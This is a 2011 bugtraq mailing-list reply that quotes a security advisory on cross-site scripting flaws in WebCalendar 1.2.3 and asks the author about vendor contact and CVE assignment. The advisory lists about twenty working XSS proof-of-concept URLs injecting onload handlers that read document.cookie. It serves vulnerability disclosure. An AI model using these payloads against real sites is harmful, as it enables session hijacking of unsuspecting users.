[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20110706105947.GA24996@foo.fgeek.fi>
Date: Wed, 6 Jul 2011 13:59:47 +0300
From: Henri Salo <henri@...v.fi>
To: sschurtz@...nline.de
Cc: bugtraq@...urityfocus.com
Subject: Re: Multiple Cross-Site Scripting vulnerabilities in WebCalendar
On Mon, Jul 04, 2011 at 06:46:09AM +0000, sschurtz@...nline.de wrote:
> Advisory: Multiple Cross-Site Scripting vulnerabilities in WebCalendar
> Advisory ID: SSCHADV2011-008
> Author: Stefan Schurtz
> Affected Software: Version 1.2.3 and probably prior versions
> Vendor URL: http://www.k5n.us/webcalendar.php
> Vendor Status: informed
> CVE-ID: -
>
> ==========================
> Vulnerability Description:
> ==========================
>
> This is a Cross-Site Scripting vulnerability
>
> ==================
> Technical Details:
> ==================
>
> http://[target]/webapps/webcalendar/about/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/about/"><body onload=alert('XSS')>
>
> http://[target]/webapps/webcalendar/colors.php?color="><iframe onload=alert(document.cookie)>
>
> http://[target]/webapps/webcalendar/datesel.php?form="><iframe onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/datesel.php?form=3&fday="><iframe onload=alert(document.cookie)>&fmonth=3&fyear=3&date=20110601
> http://[target]/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth="><iframe onload=alert(document.cookie)>&fyear=3&date=20110601
> http://[target]/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth=3&fyear="><iframe onload=alert(document.cookie)>&date=20110601
>
> http://[target]/webapps/webcalendar/year.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/select_user.php/"><body onload=alert(document.cookie)>
>
> http://[target]/webapps/webcalendar/week.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/month.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/search_handler.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/day.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/datesel.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/edit_entry.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/search.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/help_edit_entry.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/catsel.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/help_index.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/help_docs.php/"><body onload=alert(document.cookie)>
> http://[target]/webapps/webcalendar/help_bug.php/"><body onload=alert(document.cookie)>
>
> =========
> Solution:
> =========
>
> -
>
> ====================
> Disclosure Timeline:
> ====================
>
> 02-Jul-2011 - informed developers
> 02-Jul-2011 - Release date of this security advisory
>
> ========
> Credits:
> ========
>
> Vulnerabilities found and advisory written by Stefan Schurtz.
>
> ===========
> References:
> ===========
>
> http://www.k5n.us/webcalendar.php
> http://www.rul3z.de/advisories/SSCHADV2011-008.txt
How did the vendor react to your notification? Do you want me to request CVE-identifier for this issue or did you already request one?
Best regards,
Henri Salo
Powered by blists - more mailing lists